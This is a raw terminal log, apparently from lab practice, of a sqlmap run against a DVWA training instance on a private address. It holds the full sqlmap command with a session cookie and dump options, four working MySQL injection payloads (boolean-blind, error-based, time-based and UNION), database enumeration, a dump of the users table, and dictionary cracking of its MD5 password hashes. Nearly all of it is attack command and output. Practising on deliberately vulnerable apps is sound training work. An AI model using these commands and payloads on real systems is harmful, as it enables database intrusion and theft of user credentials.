┌──(sushanto㉿Sushanto-Kali64)-[~]
└─$ sqlmap --cookie="security=low; PHPSESSID=04aa3264d2ca461831ecebd7ca6e500d" -u "http://192.168.50.151/dvwa/vulnerabilities/sqli/?id=1+&Submit=Submit" --dbs --level=3 --risk=3 --time-sec=5 --threads=10 --tamper=space2comment --batch --dump

        ___
       __H__                                                                                                                                                                                                                                                                                                                                                                                
 ___ ___["]_____ ___ ___  {1.8.8#stable}                                                                                                                                                                                                                                                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                                                                                                                                                                                                                                                   
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:11:08 /2024-09-19/

[18:11:08] [INFO] loading tamper module 'space2comment'
[18:11:08] [INFO] resuming back-end DBMS 'mysql' 
[18:11:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1 ' OR NOT 3257=3257#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 ' AND ROW(8897,2697)>(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(8897=8897,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM (SELECT 4775 UNION SELECT 2498 UNION SELECT 6081 UNION SELECT 8222)a GROUP BY x)-- Vada&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 ' AND (SELECT 5060 FROM (SELECT(SLEEP(5)))mXzD)-- UAOm&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1 ' UNION ALL SELECT NULL,CONCAT(0x717a767871,0x51476e576e534465635173586876714453544941574d4f6761566b64776a6169794c7a585855674b,0x7171716a71)#&Submit=Submit
---
[18:11:08] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:11:08] [INFO] the back-end DBMS is MySQL
[18:11:08] [WARNING] reflective value(s) found and filtering out
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[18:11:08] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[18:11:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[18:11:09] [INFO] fetching current database
[18:11:09] [INFO] fetching tables for database: 'dvwa'
[18:11:09] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[18:11:09] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+--------+-------------------------+
| comment_id | name   | comment                 |
+------------+--------+-------------------------+
| 1          | test   | This is a test comment. |
+------------+--------+-------------------------+

[18:11:09] [INFO] table 'dvwa.guestbook' dumped to CSV file '/home/sushanto/.local/share/sqlmap/output/192.168.50.151/dump/dvwa/guestbook.csv'
[18:11:09] [INFO] fetching columns for table 'users' in database 'dvwa'
[18:11:09] [INFO] fetching entries for table 'users' in database 'dvwa'
[18:11:09] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[18:11:09] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:11:09] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[18:11:09] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[18:11:09] [INFO] starting 4 processes 
[18:11:09] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                                                                                                                                                                                                                                                                    
[18:11:10] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                                                                                                                                                                                                                                                                   
[18:11:10] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                                                                                                                                                                                                                                                                   
[18:11:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                                                                                                                                                                                                                                                                  
Database: dvwa                                                                                                                                                                                                                                                                                                                                                                             
Table: users
[5 entries]
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                                | password                                    | last_name | first_name |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://172.16.123.129/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://172.16.123.129/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+

[18:11:13] [INFO] table 'dvwa.users' dumped to CSV file '/home/sushanto/.local/share/sqlmap/output/192.168.50.151/dump/dvwa/users.csv'
[18:11:13] [INFO] fetched data logged to text files under '/home/sushanto/.local/share/sqlmap/output/192.168.50.151'

[*] ending @ 18:11:13 /2024-09-19/

                                                                                                                                                                                                                                                                                                                                                                                            
┌──(sushanto㉿Sushanto-Kali64)-[~]
└─$ 
